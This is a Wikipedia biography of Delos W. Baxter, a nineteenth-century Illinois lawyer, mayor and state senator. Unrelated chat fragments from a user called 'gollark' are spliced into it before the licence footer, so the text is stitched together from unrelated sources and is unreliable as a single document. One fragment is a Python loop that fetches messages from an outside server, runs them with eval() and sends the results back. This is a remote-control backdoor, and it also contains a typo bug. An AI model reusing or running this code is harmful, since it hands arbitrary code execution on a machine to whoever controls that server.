Delos W. Baxter

Delos Wirick Baxter (July 29, 1857 September 28, 1918) was an American lawyer and politician.

Baxter was born in Rochelle, Illinois and went to the Rochelle public schools. In 1881, Baxter graduated from the Iowa State University law school and was admitted to the Illinois bar. Baxter practiced law in Rochelle, Illinois and was also involved in the banking business. He served as mayor of Rochelle and as state's attorney for Ogle County, Illinois. Baxter was a Republican. Baxter served in the Illinois Senate from 1897 to 1901. Baxter died in Rochelle, Illinois.[1][2]

Notes

  1. 'Official directory of the General Assembly of Illinois, 1899,' Biographical Sketch of Delos W. Baxter, pg. 37
  2. 'Attorney Baxter Of Rochelle Dead,' Dixon Evening Leader, September 30, 1918, pg. 8
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: try: send(repr(eval(data["result"]["data"]))) except Exception as e: end(repr(e))```Here is a small version if you want that.
gollark: However, imagine disutilization of internet protocol version 6.
gollark: 0.0.0.0?
gollark: They proved themselves a formidable adversary last time.
gollark: Nope.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.